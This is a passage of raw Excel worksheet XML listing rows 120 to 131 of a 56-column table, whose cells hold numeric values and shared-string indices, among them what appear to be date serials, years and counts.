      </c>
      <c r="AF120" t="s">
        <v>1090</v>
      </c>
      <c r="AG120">
        <v>67154</v>
      </c>
      <c r="AH120">
        <v>16</v>
      </c>
      <c r="AJ120">
        <v>241</v>
      </c>
      <c r="AK120" t="s">
        <v>539</v>
      </c>
      <c r="AL120" t="s">
        <v>1082</v>
      </c>
      <c r="AM120" t="s">
        <v>1091</v>
      </c>
      <c r="AN120" t="s">
        <v>82</v>
      </c>
      <c r="AO120">
        <v>2014</v>
      </c>
      <c r="AP120" t="s">
        <v>1092</v>
      </c>
      <c r="AQ120" t="s">
        <v>1093</v>
      </c>
      <c r="AR120" t="s">
        <v>1094</v>
      </c>
      <c r="AS120" t="s">
        <v>71</v>
      </c>
      <c r="AT120" t="s">
        <v>86</v>
      </c>
      <c r="AU120">
        <v>25</v>
      </c>
      <c r="AV120">
        <v>1</v>
      </c>
      <c r="AW120">
        <v>100</v>
      </c>
      <c r="AX120">
        <v>75</v>
      </c>
      <c r="AY120">
        <v>10</v>
      </c>
      <c r="AZ120">
        <v>6</v>
      </c>
      <c r="BA120" t="s">
        <v>17360</v>
      </c>
      <c r="BB120" t="s">
        <v>14862</v>
      </c>
      <c r="BC120">
        <v>0</v>
      </c>
      <c r="BD120" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="121" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>458</v>
      </c>
      <c r="B121" t="s">
        <v>1095</v>
      </c>
      <c r="C121" t="s">
        <v>189</v>
      </c>
      <c r="D121" t="s">
        <v>1096</v>
      </c>
      <c r="E121" t="s">
        <v>142</v>
      </c>
      <c r="F121" t="s">
        <v>666</v>
      </c>
      <c r="G121" s="1">
        <v>44118</v>
      </c>
      <c r="H121">
        <v>3277</v>
      </c>
      <c r="I121">
        <v>3277</v>
      </c>
      <c r="J121">
        <v>2</v>
      </c>
      <c r="K121">
        <v>0</v>
      </c>
      <c r="L121">
        <v>2</v>
      </c>
      <c r="M121">
        <v>0</v>
      </c>
      <c r="N121">
        <v>0</v>
      </c>
      <c r="O121">
        <v>1</v>
      </c>
      <c r="P121">
        <v>0</v>
      </c>
      <c r="Q121">
        <v>1</v>
      </c>
      <c r="R121">
        <v>5</v>
      </c>
      <c r="S121">
        <v>0</v>
      </c>
      <c r="T121">
        <v>0</v>
      </c>
      <c r="U121">
        <v>100000</v>
      </c>
      <c r="V121">
        <v>0</v>
      </c>
      <c r="W121">
        <v>10000</v>
      </c>
      <c r="X121">
        <v>0</v>
      </c>
      <c r="Y121">
        <v>0</v>
      </c>
      <c r="Z121">
        <v>20000</v>
      </c>
      <c r="AA121">
        <v>0</v>
      </c>
      <c r="AB121">
        <v>1000</v>
      </c>
      <c r="AC121">
        <v>1000</v>
      </c>
      <c r="AD121">
        <v>0</v>
      </c>
      <c r="AE121">
        <v>0</v>
      </c>
      <c r="AF121" t="s">
        <v>1097</v>
      </c>
      <c r="AG121">
        <v>97236</v>
      </c>
      <c r="AH121">
        <v>31</v>
      </c>
      <c r="AI121" t="s">
        <v>1098</v>
      </c>
      <c r="AJ121">
        <v>461</v>
      </c>
      <c r="AK121" t="s">
        <v>1099</v>
      </c>
      <c r="AL121" t="s">
        <v>1100</v>
      </c>
      <c r="AM121" t="s">
        <v>1101</v>
      </c>
      <c r="AN121" t="s">
        <v>1102</v>
      </c>
      <c r="AO121">
        <v>2008</v>
      </c>
      <c r="AP121">
        <v>81249315647</v>
      </c>
      <c r="AQ121" t="s">
        <v>1103</v>
      </c>
      <c r="AR121" t="s">
        <v>1104</v>
      </c>
      <c r="AS121" t="s">
        <v>1105</v>
      </c>
      <c r="AT121" t="s">
        <v>58</v>
      </c>
      <c r="AU121">
        <v>15</v>
      </c>
      <c r="AV121">
        <v>1</v>
      </c>
      <c r="AW121">
        <v>3</v>
      </c>
      <c r="AX121">
        <v>15</v>
      </c>
      <c r="AY121">
        <v>10</v>
      </c>
      <c r="AZ121">
        <v>3</v>
      </c>
      <c r="BA121" t="s">
        <v>17558</v>
      </c>
      <c r="BB121" t="s">
        <v>14590</v>
      </c>
      <c r="BC121" t="s">
        <v>10841</v>
      </c>
      <c r="BD121">
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>608</v>
      </c>
      <c r="B122" t="s">
        <v>1106</v>
      </c>
      <c r="C122" t="s">
        <v>168</v>
      </c>
      <c r="D122" t="s">
        <v>1107</v>
      </c>
      <c r="E122" t="s">
        <v>142</v>
      </c>
      <c r="F122" t="s">
        <v>441</v>
      </c>
      <c r="G122" s="1">
        <v>43923</v>
      </c>
      <c r="H122">
        <v>3285</v>
      </c>
      <c r="I122">
        <v>3285</v>
      </c>
      <c r="J122">
        <v>1</v>
      </c>
      <c r="K122">
        <v>0</v>
      </c>
      <c r="L122">
        <v>2</v>
      </c>
      <c r="M122">
        <v>0</v>
      </c>
      <c r="N122">
        <v>0</v>
      </c>
      <c r="O122">
        <v>0</v>
      </c>
      <c r="P122">
        <v>0</v>
      </c>
      <c r="Q122">
        <v>2</v>
      </c>
      <c r="R122">
        <v>0</v>
      </c>
      <c r="S122">
        <v>0</v>
      </c>
      <c r="T122">
        <v>0</v>
      </c>
      <c r="U122">
        <v>60000</v>
      </c>
      <c r="V122">
        <v>0</v>
      </c>
      <c r="W122">
        <v>8000</v>
      </c>
      <c r="X122">
        <v>0</v>
      </c>
      <c r="Y122">
        <v>0</v>
      </c>
      <c r="Z122">
        <v>0</v>
      </c>
      <c r="AA122">
        <v>0</v>
      </c>
      <c r="AB122">
        <v>50</v>
      </c>
      <c r="AC122">
        <v>0</v>
      </c>
      <c r="AD122">
        <v>0</v>
      </c>
      <c r="AE122">
        <v>0</v>
      </c>
      <c r="AF122" t="s">
        <v>1108</v>
      </c>
      <c r="AG122">
        <v>43364</v>
      </c>
      <c r="AH122">
        <v>13</v>
      </c>
      <c r="AJ122">
        <v>162</v>
      </c>
      <c r="AK122" t="s">
        <v>1109</v>
      </c>
      <c r="AL122" t="s">
        <v>1109</v>
      </c>
      <c r="AM122" t="s">
        <v>1110</v>
      </c>
      <c r="AN122" t="s">
        <v>55</v>
      </c>
      <c r="AO122">
        <v>2009</v>
      </c>
      <c r="AP122" t="s">
        <v>1111</v>
      </c>
      <c r="AQ122" t="s">
        <v>1112</v>
      </c>
      <c r="AR122" t="s">
        <v>1108</v>
      </c>
      <c r="AS122" t="s">
        <v>71</v>
      </c>
      <c r="AT122" t="s">
        <v>58</v>
      </c>
      <c r="AU122">
        <v>26</v>
      </c>
      <c r="AV122">
        <v>1</v>
      </c>
      <c r="AW122">
        <v>5</v>
      </c>
      <c r="AX122">
        <v>5</v>
      </c>
      <c r="AY122">
        <v>3</v>
      </c>
      <c r="AZ122">
        <v>2</v>
      </c>
      <c r="BA122" t="s">
        <v>16724</v>
      </c>
      <c r="BB122" t="s">
        <v>14714</v>
      </c>
      <c r="BC122">
        <v>0</v>
      </c>
      <c r="BD122" t="s">
        <v>9494</v>
      </c>
    </row>
    <row r="123" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>768</v>
      </c>
      <c r="B123" t="s">
        <v>1113</v>
      </c>
      <c r="C123" t="s">
        <v>157</v>
      </c>
      <c r="D123" t="s">
        <v>1114</v>
      </c>
      <c r="E123" t="s">
        <v>111</v>
      </c>
      <c r="F123" t="s">
        <v>1115</v>
      </c>
      <c r="G123" s="1">
        <v>44204</v>
      </c>
      <c r="H123">
        <v>3309</v>
      </c>
      <c r="I123">
        <v>3309</v>
      </c>
      <c r="J123">
        <v>3</v>
      </c>
      <c r="K123">
        <v>0</v>
      </c>
      <c r="L123">
        <v>3</v>
      </c>
      <c r="M123">
        <v>0</v>
      </c>
      <c r="N123">
        <v>0</v>
      </c>
      <c r="O123">
        <v>0</v>
      </c>
      <c r="P123">
        <v>0</v>
      </c>
      <c r="Q123">
        <v>4</v>
      </c>
      <c r="R123">
        <v>5</v>
      </c>
      <c r="S123">
        <v>0</v>
      </c>
      <c r="T123">
        <v>0</v>
      </c>
      <c r="U123">
        <v>0</v>
      </c>
      <c r="V123">
        <v>0</v>
      </c>
      <c r="W123">
        <v>0</v>
      </c>
      <c r="X123">
        <v>0</v>
      </c>
      <c r="Y123">
        <v>0</v>
      </c>
      <c r="Z123">
        <v>0</v>
      </c>
      <c r="AA123">
        <v>0</v>
      </c>
      <c r="AB123">
        <v>0</v>
      </c>
      <c r="AC123">
        <v>0</v>
      </c>
      <c r="AD123">
        <v>0</v>
      </c>
      <c r="AE123">
        <v>0</v>
      </c>
      <c r="AF123" t="s">
        <v>1116</v>
      </c>
      <c r="AG123">
        <v>67152</v>
      </c>
      <c r="AH123">
        <v>16</v>
      </c>
      <c r="AJ123">
        <v>241</v>
      </c>
      <c r="AK123" t="s">
        <v>1117</v>
      </c>
      <c r="AL123" t="s">
        <v>1118</v>
      </c>
      <c r="AM123" t="s">
        <v>1119</v>
      </c>
      <c r="AN123" t="s">
        <v>55</v>
      </c>
      <c r="AO123">
        <v>2016</v>
      </c>
      <c r="AP123" t="s">
        <v>1120</v>
      </c>
      <c r="AQ123" t="s">
        <v>1121</v>
      </c>
      <c r="AR123" t="s">
        <v>1122</v>
      </c>
      <c r="AS123" t="s">
        <v>71</v>
      </c>
      <c r="AT123" t="s">
        <v>58</v>
      </c>
      <c r="AU123">
        <v>0</v>
      </c>
      <c r="AV123">
        <v>0</v>
      </c>
      <c r="AW123">
        <v>0</v>
      </c>
      <c r="AX123">
        <v>0</v>
      </c>
      <c r="AY123">
        <v>2</v>
      </c>
      <c r="AZ123">
        <v>4</v>
      </c>
      <c r="BA123" t="s">
        <v>16754</v>
      </c>
      <c r="BB123" t="s">
        <v>14840</v>
      </c>
      <c r="BC123" t="s">
        <v>9485</v>
      </c>
      <c r="BD123" t="s">
        <v>10861</v>
      </c>
    </row>
    <row r="124" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>520</v>
      </c>
      <c r="B124" t="s">
        <v>1123</v>
      </c>
      <c r="C124" t="s">
        <v>157</v>
      </c>
      <c r="D124" t="s">
        <v>1124</v>
      </c>
      <c r="E124" t="s">
        <v>142</v>
      </c>
      <c r="F124" t="s">
        <v>1125</v>
      </c>
      <c r="G124" s="1">
        <v>43980</v>
      </c>
      <c r="H124">
        <v>3323</v>
      </c>
      <c r="I124">
        <v>3323</v>
      </c>
      <c r="J124">
        <v>2</v>
      </c>
      <c r="K124">
        <v>0</v>
      </c>
      <c r="L124">
        <v>2</v>
      </c>
      <c r="M124">
        <v>0</v>
      </c>
      <c r="N124">
        <v>0</v>
      </c>
      <c r="O124">
        <v>0</v>
      </c>
      <c r="P124">
        <v>0</v>
      </c>
      <c r="Q124">
        <v>0</v>
      </c>
      <c r="R124">
        <v>0</v>
      </c>
      <c r="S124">
        <v>0</v>
      </c>
      <c r="T124">
        <v>0</v>
      </c>
      <c r="U124">
        <v>400000</v>
      </c>
      <c r="V124">
        <v>0</v>
      </c>
      <c r="W124">
        <v>7000</v>
      </c>
      <c r="X124">
        <v>0</v>
      </c>
      <c r="Y124">
        <v>0</v>
      </c>
      <c r="Z124">
        <v>0</v>
      </c>
      <c r="AA124">
        <v>0</v>
      </c>
      <c r="AB124">
        <v>0</v>
      </c>
      <c r="AC124">
        <v>0</v>
      </c>
      <c r="AD124">
        <v>0</v>
      </c>
      <c r="AE124">
        <v>0</v>
      </c>
      <c r="AF124" t="s">
        <v>1126</v>
      </c>
      <c r="AG124">
        <v>62263</v>
      </c>
      <c r="AH124">
        <v>16</v>
      </c>
      <c r="AJ124">
        <v>251</v>
      </c>
      <c r="AK124" t="s">
        <v>802</v>
      </c>
      <c r="AL124" t="s">
        <v>802</v>
      </c>
      <c r="AM124" t="s">
        <v>1127</v>
      </c>
      <c r="AN124" t="s">
        <v>55</v>
      </c>
      <c r="AO124">
        <v>1999</v>
      </c>
      <c r="AP124">
        <v>3224660997</v>
      </c>
      <c r="AQ124" t="s">
        <v>1128</v>
      </c>
      <c r="AR124" t="s">
        <v>1129</v>
      </c>
      <c r="AS124" t="s">
        <v>71</v>
      </c>
      <c r="AT124" t="s">
        <v>58</v>
      </c>
      <c r="AU124">
        <v>7</v>
      </c>
      <c r="AV124">
        <v>0</v>
      </c>
      <c r="AW124">
        <v>12</v>
      </c>
      <c r="AX124">
        <v>5</v>
      </c>
      <c r="AY124">
        <v>1</v>
      </c>
      <c r="AZ124">
        <v>2</v>
      </c>
      <c r="BA124" t="s">
        <v>16870</v>
      </c>
      <c r="BB124" t="s">
        <v>14638</v>
      </c>
      <c r="BC124" t="s">
        <v>10870</v>
      </c>
      <c r="BD124" t="s">
        <v>10868</v>
      </c>
    </row>
    <row r="125" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>242</v>
      </c>
      <c r="B125" t="s">
        <v>1130</v>
      </c>
      <c r="C125" t="s">
        <v>157</v>
      </c>
      <c r="D125" t="s">
        <v>1131</v>
      </c>
      <c r="E125" t="s">
        <v>984</v>
      </c>
      <c r="F125" t="s">
        <v>1132</v>
      </c>
      <c r="G125" s="1">
        <v>44124</v>
      </c>
      <c r="H125">
        <v>3341</v>
      </c>
      <c r="I125">
        <v>3341</v>
      </c>
      <c r="J125">
        <v>4</v>
      </c>
      <c r="K125">
        <v>0</v>
      </c>
      <c r="L125">
        <v>0</v>
      </c>
      <c r="M125">
        <v>0</v>
      </c>
      <c r="N125">
        <v>0</v>
      </c>
      <c r="O125">
        <v>0</v>
      </c>
      <c r="P125">
        <v>0</v>
      </c>
      <c r="Q125">
        <v>0</v>
      </c>
      <c r="R125">
        <v>0</v>
      </c>
      <c r="S125">
        <v>0</v>
      </c>
      <c r="T125">
        <v>0</v>
      </c>
      <c r="U125">
        <v>200</v>
      </c>
      <c r="V125">
        <v>0</v>
      </c>
      <c r="W125">
        <v>0</v>
      </c>
      <c r="X125">
        <v>0</v>
      </c>
      <c r="Y125">
        <v>0</v>
      </c>
      <c r="Z125">
        <v>0</v>
      </c>
      <c r="AA125">
        <v>0</v>
      </c>
      <c r="AB125">
        <v>0</v>
      </c>
      <c r="AC125">
        <v>0</v>
      </c>
      <c r="AD125">
        <v>0</v>
      </c>
      <c r="AE125">
        <v>0</v>
      </c>
      <c r="AF125" t="s">
        <v>1133</v>
      </c>
      <c r="AG125">
        <v>68421</v>
      </c>
      <c r="AH125">
        <v>16</v>
      </c>
      <c r="AJ125">
        <v>237</v>
      </c>
      <c r="AK125" t="s">
        <v>311</v>
      </c>
      <c r="AL125" t="s">
        <v>506</v>
      </c>
      <c r="AM125" t="s">
        <v>1134</v>
      </c>
      <c r="AN125" t="s">
        <v>55</v>
      </c>
      <c r="AO125">
        <v>2012</v>
      </c>
      <c r="AP125">
        <v>333424324423255</v>
      </c>
      <c r="AQ125" t="s">
        <v>1135</v>
      </c>
      <c r="AR125" t="s">
        <v>1136</v>
      </c>
      <c r="AS125" t="s">
        <v>371</v>
      </c>
      <c r="AT125" t="s">
        <v>58</v>
      </c>
      <c r="AU125">
        <v>25</v>
      </c>
      <c r="AV125">
        <v>1</v>
      </c>
      <c r="AW125">
        <v>25</v>
      </c>
      <c r="AX125">
        <v>20</v>
      </c>
      <c r="AY125">
        <v>30</v>
      </c>
      <c r="AZ125">
        <v>18</v>
      </c>
      <c r="BA125" t="s">
        <v>16649</v>
      </c>
      <c r="BB125" t="s">
        <v>14416</v>
      </c>
      <c r="BC125">
        <v>0</v>
      </c>
      <c r="BD125" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="126" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>603</v>
      </c>
      <c r="B126" t="s">
        <v>1137</v>
      </c>
      <c r="C126" t="s">
        <v>157</v>
      </c>
      <c r="D126" t="s">
        <v>1138</v>
      </c>
      <c r="E126" t="s">
        <v>363</v>
      </c>
      <c r="F126" t="s">
        <v>1139</v>
      </c>
      <c r="G126" s="1">
        <v>44039</v>
      </c>
      <c r="H126">
        <v>3364</v>
      </c>
      <c r="I126">
        <v>3364</v>
      </c>
      <c r="J126">
        <v>0</v>
      </c>
      <c r="K126">
        <v>0</v>
      </c>
      <c r="L126">
        <v>0</v>
      </c>
      <c r="M126">
        <v>0</v>
      </c>
      <c r="N126">
        <v>0</v>
      </c>
      <c r="O126">
        <v>0</v>
      </c>
      <c r="P126">
        <v>0</v>
      </c>
      <c r="Q126">
        <v>0</v>
      </c>
      <c r="R126">
        <v>0</v>
      </c>
      <c r="S126">
        <v>1</v>
      </c>
      <c r="T126">
        <v>1</v>
      </c>
      <c r="U126">
        <v>0</v>
      </c>
      <c r="V126">
        <v>0</v>
      </c>
      <c r="W126">
        <v>0</v>
      </c>
      <c r="X126">
        <v>0</v>
      </c>
      <c r="Y126">
        <v>0</v>
      </c>
      <c r="Z126">
        <v>0</v>
      </c>
      <c r="AA126">
        <v>0</v>
      </c>
      <c r="AB126">
        <v>0</v>
      </c>
      <c r="AC126">
        <v>0</v>
      </c>
      <c r="AD126">
        <v>1</v>
      </c>
      <c r="AE126">
        <v>60</v>
      </c>
      <c r="AF126" t="s">
        <v>1140</v>
      </c>
      <c r="AG126">
        <v>60182</v>
      </c>
      <c r="AH126">
        <v>16</v>
      </c>
      <c r="AJ126">
        <v>264</v>
      </c>
      <c r="AK126" t="s">
        <v>1141</v>
      </c>
      <c r="AL126" t="s">
        <v>1141</v>
      </c>
      <c r="AM126" t="s">
        <v>1142</v>
      </c>
      <c r="AN126" t="s">
        <v>68</v>
      </c>
      <c r="AO126">
        <v>2018</v>
      </c>
      <c r="AP126">
        <v>81228151212</v>
      </c>
      <c r="AQ126" t="s">
        <v>1140</v>
      </c>
      <c r="AR126" t="s">
        <v>1140</v>
      </c>
      <c r="AU126">
        <v>6</v>
      </c>
      <c r="AV126">
        <v>0</v>
      </c>
      <c r="AW126">
        <v>10</v>
      </c>
      <c r="AX126">
        <v>0</v>
      </c>
      <c r="AY126">
        <v>4</v>
      </c>
      <c r="AZ126">
        <v>0</v>
      </c>
      <c r="BA126" t="s">
        <v>17304</v>
      </c>
      <c r="BB126" t="s">
        <v>14711</v>
      </c>
      <c r="BC126">
        <v>0</v>
      </c>
      <c r="BD126" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="127" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>459</v>
      </c>
      <c r="B127" t="s">
        <v>1143</v>
      </c>
      <c r="C127" t="s">
        <v>157</v>
      </c>
      <c r="D127" t="s">
        <v>1144</v>
      </c>
      <c r="E127" t="s">
        <v>242</v>
      </c>
      <c r="F127" t="s">
        <v>1145</v>
      </c>
      <c r="G127" s="1">
        <v>43935</v>
      </c>
      <c r="H127">
        <v>3385</v>
      </c>
      <c r="I127">
        <v>3385</v>
      </c>
      <c r="J127">
        <v>3</v>
      </c>
      <c r="K127">
        <v>0</v>
      </c>
      <c r="L127">
        <v>3</v>
      </c>
      <c r="M127">
        <v>0</v>
      </c>
      <c r="N127">
        <v>0</v>
      </c>
      <c r="O127">
        <v>0</v>
      </c>
      <c r="P127">
        <v>10</v>
      </c>
      <c r="Q127">
        <v>2</v>
      </c>
      <c r="R127">
        <v>25</v>
      </c>
      <c r="S127">
        <v>9</v>
      </c>
      <c r="T127">
        <v>2</v>
      </c>
      <c r="U127">
        <v>2000000</v>
      </c>
      <c r="V127">
        <v>0</v>
      </c>
      <c r="W127">
        <v>20000</v>
      </c>
      <c r="X127">
        <v>0</v>
      </c>
      <c r="Y127">
        <v>0</v>
      </c>
      <c r="Z127">
        <v>0</v>
      </c>
      <c r="AA127">
        <v>20000</v>
      </c>
      <c r="AB127">
        <v>20000</v>
      </c>
      <c r="AC127">
        <v>25000</v>
      </c>
      <c r="AD127">
        <v>15000</v>
      </c>
      <c r="AE127">
        <v>20000000</v>
      </c>
      <c r="AF127" t="s">
        <v>1146</v>
      </c>
      <c r="AG127">
        <v>68472</v>
      </c>
      <c r="AH127">
        <v>16</v>
      </c>
      <c r="AJ127">
        <v>237</v>
      </c>
      <c r="AK127" t="s">
        <v>377</v>
      </c>
      <c r="AL127" t="s">
        <v>1147</v>
      </c>
      <c r="AM127" t="s">
        <v>1148</v>
      </c>
      <c r="AN127" t="s">
        <v>55</v>
      </c>
      <c r="AO127">
        <v>2006</v>
      </c>
      <c r="AP127">
        <v>333593281</v>
      </c>
      <c r="AQ127" t="s">
        <v>1149</v>
      </c>
      <c r="AR127" t="s">
        <v>1150</v>
      </c>
      <c r="AS127" t="s">
        <v>71</v>
      </c>
      <c r="AT127" t="s">
        <v>58</v>
      </c>
      <c r="AU127">
        <v>26</v>
      </c>
      <c r="AV127">
        <v>2</v>
      </c>
      <c r="AW127">
        <v>139</v>
      </c>
      <c r="AX127">
        <v>131</v>
      </c>
      <c r="AY127">
        <v>9</v>
      </c>
      <c r="AZ127">
        <v>8</v>
      </c>
      <c r="BA127" t="s">
        <v>16698</v>
      </c>
      <c r="BB127" t="s">
        <v>14591</v>
      </c>
      <c r="BC127">
        <v>0</v>
      </c>
      <c r="BD127" t="s">
        <v>9629</v>
      </c>
    </row>
    <row r="128" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>395</v>
      </c>
      <c r="B128" t="s">
        <v>1151</v>
      </c>
      <c r="C128" t="s">
        <v>189</v>
      </c>
      <c r="D128" t="s">
        <v>1152</v>
      </c>
      <c r="E128" t="s">
        <v>111</v>
      </c>
      <c r="F128" t="s">
        <v>1153</v>
      </c>
      <c r="G128" s="1">
        <v>43971</v>
      </c>
      <c r="H128">
        <v>3387</v>
      </c>
      <c r="I128">
        <v>3387</v>
      </c>
      <c r="J128">
        <v>1</v>
      </c>
      <c r="K128">
        <v>0</v>
      </c>
      <c r="L128">
        <v>1</v>
      </c>
      <c r="M128">
        <v>0</v>
      </c>
      <c r="N128">
        <v>0</v>
      </c>
      <c r="O128">
        <v>0</v>
      </c>
      <c r="P128">
        <v>0</v>
      </c>
      <c r="Q128">
        <v>0</v>
      </c>
      <c r="R128">
        <v>0</v>
      </c>
      <c r="S128">
        <v>0</v>
      </c>
      <c r="T128">
        <v>0</v>
      </c>
      <c r="U128">
        <v>50000</v>
      </c>
      <c r="V128">
        <v>0</v>
      </c>
      <c r="W128">
        <v>2500</v>
      </c>
      <c r="X128">
        <v>0</v>
      </c>
      <c r="Y128">
        <v>0</v>
      </c>
      <c r="Z128">
        <v>0</v>
      </c>
      <c r="AA128">
        <v>0</v>
      </c>
      <c r="AB128">
        <v>0</v>
      </c>
      <c r="AC128">
        <v>0</v>
      </c>
      <c r="AD128">
        <v>0</v>
      </c>
      <c r="AE128">
        <v>0</v>
      </c>
      <c r="AF128" t="s">
        <v>1154</v>
      </c>
      <c r="AG128">
        <v>97662</v>
      </c>
      <c r="AH128">
        <v>31</v>
      </c>
      <c r="AJ128">
        <v>456</v>
      </c>
      <c r="AK128" t="s">
        <v>1155</v>
      </c>
      <c r="AL128" t="s">
        <v>1156</v>
      </c>
      <c r="AM128" t="s">
        <v>1157</v>
      </c>
      <c r="AN128" t="s">
        <v>55</v>
      </c>
      <c r="AO128">
        <v>2009</v>
      </c>
      <c r="AP128">
        <v>91721088</v>
      </c>
      <c r="AQ128" t="s">
        <v>1158</v>
      </c>
      <c r="AR128" t="s">
        <v>1154</v>
      </c>
      <c r="AS128" t="s">
        <v>71</v>
      </c>
      <c r="AT128" t="s">
        <v>58</v>
      </c>
      <c r="AU128">
        <v>24</v>
      </c>
      <c r="AV128">
        <v>1</v>
      </c>
      <c r="AW128">
        <v>1</v>
      </c>
      <c r="AX128">
        <v>0</v>
      </c>
      <c r="AY128">
        <v>11</v>
      </c>
      <c r="AZ128">
        <v>7</v>
      </c>
      <c r="BA128" t="s">
        <v>16683</v>
      </c>
      <c r="BB128" t="s">
        <v>14540</v>
      </c>
      <c r="BC128" t="s">
        <v>9536</v>
      </c>
      <c r="BD128" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="129" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>541</v>
      </c>
      <c r="B129" t="s">
        <v>1159</v>
      </c>
      <c r="C129" t="s">
        <v>157</v>
      </c>
      <c r="D129" t="s">
        <v>1160</v>
      </c>
      <c r="E129" t="s">
        <v>1161</v>
      </c>
      <c r="F129" t="s">
        <v>1162</v>
      </c>
      <c r="G129" s="1">
        <v>44034</v>
      </c>
      <c r="H129">
        <v>3416</v>
      </c>
      <c r="I129">
        <v>3416</v>
      </c>
      <c r="J129">
        <v>2</v>
      </c>
      <c r="K129">
        <v>0</v>
      </c>
      <c r="L129">
        <v>1</v>
      </c>
      <c r="M129">
        <v>0</v>
      </c>
      <c r="N129">
        <v>0</v>
      </c>
      <c r="O129">
        <v>0</v>
      </c>
      <c r="P129">
        <v>0</v>
      </c>
      <c r="Q129">
        <v>10</v>
      </c>
      <c r="R129">
        <v>10</v>
      </c>
      <c r="S129">
        <v>0</v>
      </c>
      <c r="T129">
        <v>1</v>
      </c>
      <c r="U129">
        <v>6000</v>
      </c>
      <c r="V129">
        <v>0</v>
      </c>
      <c r="W129">
        <v>500</v>
      </c>
      <c r="X129">
        <v>0</v>
      </c>
      <c r="Y129">
        <v>0</v>
      </c>
      <c r="Z129">
        <v>0</v>
      </c>
      <c r="AA129">
        <v>0</v>
      </c>
      <c r="AB129">
        <v>30</v>
      </c>
      <c r="AC129">
        <v>30</v>
      </c>
      <c r="AD129">
        <v>0</v>
      </c>
      <c r="AE129">
        <v>20000</v>
      </c>
      <c r="AF129" t="s">
        <v>1163</v>
      </c>
      <c r="AG129">
        <v>61257</v>
      </c>
      <c r="AH129">
        <v>16</v>
      </c>
      <c r="AJ129">
        <v>242</v>
      </c>
      <c r="AK129" t="s">
        <v>1164</v>
      </c>
      <c r="AL129" t="s">
        <v>1165</v>
      </c>
      <c r="AM129" t="s">
        <v>1166</v>
      </c>
      <c r="AN129" t="s">
        <v>55</v>
      </c>
      <c r="AO129">
        <v>1998</v>
      </c>
      <c r="AP129" t="s">
        <v>1167</v>
      </c>
      <c r="AQ129" t="s">
        <v>1168</v>
      </c>
      <c r="AR129" t="s">
        <v>1169</v>
      </c>
      <c r="AS129" t="s">
        <v>371</v>
      </c>
      <c r="AT129" t="s">
        <v>58</v>
      </c>
      <c r="AU129">
        <v>25</v>
      </c>
      <c r="AV129">
        <v>1</v>
      </c>
      <c r="AW129">
        <v>4</v>
      </c>
      <c r="AX129">
        <v>5</v>
      </c>
      <c r="AY129">
        <v>4</v>
      </c>
      <c r="AZ129">
        <v>2</v>
      </c>
      <c r="BA129" t="s">
        <v>17334</v>
      </c>
      <c r="BB129" t="s">
        <v>14581</v>
      </c>
      <c r="BC129">
        <v>0</v>
      </c>
      <c r="BD129" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="130" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>256</v>
      </c>
      <c r="B130" t="s">
        <v>1009</v>
      </c>
      <c r="C130" t="s">
        <v>157</v>
      </c>
      <c r="D130" t="s">
        <v>1170</v>
      </c>
      <c r="E130" t="s">
        <v>142</v>
      </c>
      <c r="F130" t="s">
        <v>1171</v>
      </c>
      <c r="G130" s="1">
        <v>43971</v>
      </c>
      <c r="H130">
        <v>3431</v>
      </c>
      <c r="I130">
        <v>3431</v>
      </c>
      <c r="J130">
        <v>3</v>
      </c>
      <c r="K130">
        <v>0</v>
      </c>
      <c r="L130">
        <v>2</v>
      </c>
      <c r="M130">
        <v>0</v>
      </c>
      <c r="N130">
        <v>0</v>
      </c>
      <c r="O130">
        <v>0</v>
      </c>
      <c r="P130">
        <v>0</v>
      </c>
      <c r="Q130">
        <v>7</v>
      </c>
      <c r="R130">
        <v>8</v>
      </c>
      <c r="S130">
        <v>0</v>
      </c>
      <c r="T130">
        <v>1</v>
      </c>
      <c r="U130">
        <v>50</v>
      </c>
      <c r="V130">
        <v>0</v>
      </c>
      <c r="W130">
        <v>5000</v>
      </c>
      <c r="X130">
        <v>0</v>
      </c>
      <c r="Y130">
        <v>0</v>
      </c>
      <c r="Z130">
        <v>0</v>
      </c>
      <c r="AA130">
        <v>0</v>
      </c>
      <c r="AB130">
        <v>700</v>
      </c>
      <c r="AC130">
        <v>4000</v>
      </c>
      <c r="AD130">
        <v>0</v>
      </c>
      <c r="AE130">
        <v>0</v>
      </c>
      <c r="AF130" t="s">
        <v>1172</v>
      </c>
      <c r="AG130">
        <v>64126</v>
      </c>
      <c r="AH130">
        <v>16</v>
      </c>
      <c r="AJ130">
        <v>257</v>
      </c>
      <c r="AK130" t="s">
        <v>93</v>
      </c>
      <c r="AL130" t="s">
        <v>1173</v>
      </c>
      <c r="AM130" t="s">
        <v>1174</v>
      </c>
      <c r="AN130" t="s">
        <v>55</v>
      </c>
      <c r="AO130">
        <v>1997</v>
      </c>
      <c r="AP130">
        <v>354688740</v>
      </c>
      <c r="AQ130" t="s">
        <v>1175</v>
      </c>
      <c r="AR130" t="s">
        <v>1172</v>
      </c>
      <c r="AS130" t="s">
        <v>71</v>
      </c>
      <c r="AT130" t="s">
        <v>58</v>
      </c>
      <c r="AU130">
        <v>0</v>
      </c>
      <c r="AV130">
        <v>0</v>
      </c>
      <c r="AW130">
        <v>10</v>
      </c>
      <c r="AX130">
        <v>50</v>
      </c>
      <c r="AY130">
        <v>2</v>
      </c>
      <c r="AZ130">
        <v>8</v>
      </c>
      <c r="BA130" t="s">
        <v>17224</v>
      </c>
      <c r="BB130" t="s">
        <v>14426</v>
      </c>
      <c r="BC130">
        <v>0</v>
      </c>
      <c r="BD130" t="s">
        <v>10109</v>
      </c>
    </row>
    <row r="131" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>489</v>
      </c>
      <c r="B131" t="s">
